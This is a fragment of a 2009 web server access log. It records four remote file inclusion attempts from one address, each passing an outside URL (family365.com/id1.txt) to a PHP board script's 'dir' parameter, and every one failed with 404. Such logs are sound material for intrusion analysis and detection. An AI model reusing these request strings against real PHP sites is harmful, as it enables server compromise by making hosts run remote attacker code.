218.38.18.203 - - [30/Oct/2009:11:22:10 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:22:10 -0700] "GET /logs/access_090807.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:22:10 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:22:10 -0700] "GET /logs/access_090816.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
